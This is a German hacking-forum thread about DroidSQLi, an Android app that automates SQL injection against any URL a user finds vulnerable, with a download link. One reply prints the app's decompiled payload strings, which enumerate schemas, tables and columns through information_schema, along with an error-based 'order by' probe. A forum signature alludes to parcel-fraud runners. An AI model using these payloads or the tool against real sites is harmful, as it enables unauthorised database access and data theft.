Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[Android] DroidSQLi

* * - - - 2  ( 1 Stimmen )
Erstellt von Ch!ller ,

  • Bitte melde dich an um zu Antworten
5 Antworten in diesem Thema

#1
Ch!ller
Geschrieben 23 Juli 2014 - 13:08 Uhr

Ch!ller

    Shinigami

  • Premium Member
    • Likes
    910
  • 937 Beiträge
  • 1318 Bedankt
  • Spender
  • verifiziert

[info]


DroidSQLi


Eingefügtes Bild


Information

  • Time based Injection
  • Blind Injection
  • Error based Injection
  • Normal Injection
Hinweis
  • All you need to do is find a vulnerable url and put it on Target URL and touch Inject
AV Scan

  • Please Login HERE or Register HERE to see this link!


Please Login HERE or Register HERE to see this link!

Eingefügtes Bild


  • Framerater, Bad Grandpa, lolonice und einem anderen gefällt das

Alle Angaben und Informationen dienen lediglich der Theorie!

Thanked by 1 Member:
lolonice

#2
Platin
Geschrieben 23 Juli 2014 - 14:00 Uhr

Platin

    ehem. insane

  • Premium Member
    • Likes
    14
  • 35 Beiträge
  • 85 Bedankt
  • Android [root], iPhone
  • Windows, Linux
Sieht nice aus. Braucht das Android Gerät Root Zugriff für dieses Tool?

#3
Framerater
Geschrieben 23 Juli 2014 - 14:28 Uhr

Framerater

    Anti-Spam Bot

  • Moderator
    • Likes
    398
  • 414 Beiträge
  • 221 Bedankt
  • 9737064
  • Android, Android [root], iPhone
  • Windows, Linux
@insane

Sie läuft mit und ohne Root :)
  • Ch!ller gefällt das
Als mein letzter Läufer busted wurde... haben sie nicht vor der Packstation gewartet... sondern in der Packstation, im Paket! Also VORSICHT ist angesagt!
Thanked by 2 Members:
~ Flo , insane

#4
ProHex
Geschrieben 23 Juli 2014 - 21:27 Uhr

ProHex

    Hacker

  • Elite Member
    • Likes
    117
  • 190 Beiträge
  • 56 Bedankt 
   const-string v9, "select+concat(group_concat(0x6868,r,0x6a6a,hex(cast(q+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+hex(cast(TABLE_SCHEMA+as+char))r,count(TABLE_NAME)q+from+INFORMATION_SCHEMA.tables+group+by+r{limit})x"
   const-string v9, "select+concat(group_concat(0x6868,hex(cast(n+as+char)),0x6a6a,0x3331,0x6868+order+by+n+separator+0x6767),0x69)from(select+COLUMN_NAME+n+from+information_schema.columns+where+TABLE_SCHEMA=0x"
   const-string v9, "order+by+n{limit}"
   const-string v12, "select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x"
   const-string v12, "order+by+r{limit}"
   const-string v28, "select+concat(group_concat(0x6868,r,0x6a6a,hex(cast(q+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+hex(cast(concat("
 const-string v8, ".*Unknown column '1337' in 'order clause'.*"
 const-string v14, "+order+by+1337--+"

Sich die strings da anzusehen ist echt interessant :D

Auch gut dass die vollkommen auf google analytics verzichten.

ich werd das noch weiter auseinandernehmen, nur empfehle ich derzeit keinem das mit rootrechten auszuführen:

.method public setParent(Ljava/lang/Object;Landroid/view/View;I)V
    .locals 0
    .parameter "info"
    .parameter "root"
    .parameter "virtualDescendantId"

warum da IDs zugewiesen werden versteh ich noch nicht.
  • smc2014 gefällt das

#5
Apfelschorle
Geschrieben 11 August 2014 - 15:04 Uhr

Apfelschorle

    Ehem. Hardcore89

  • Members
  • PIPPIPPIPPIP
    • Likes
    0
  • 37 Beiträge
  • 5 Bedankt
Was kann man mit droidsqli alles machen?

#6
Xenoby
Geschrieben 27 August 2014 - 11:37 Uhr

Xenoby

    Leecher

  • Members
  • PIP
    • Likes
    0
  • 1 Beiträge
  • 0 Bedankt

Was kann man mit droidsqli alles machen?


SQL injections.
Wenn dir das nix sagt, hier auf Toolbase gibts auch ein Tutorial dazu.
Einfach nach 'SQLi Tutorial' suchen.
Zurück zu Mobile

  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen: 0

Mitglieder: 0, Gäste: 0, unsichtbare Mitglieder: 0

Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase
  2.   Tool Area
  3.  Favoured Tools
  4. Mobile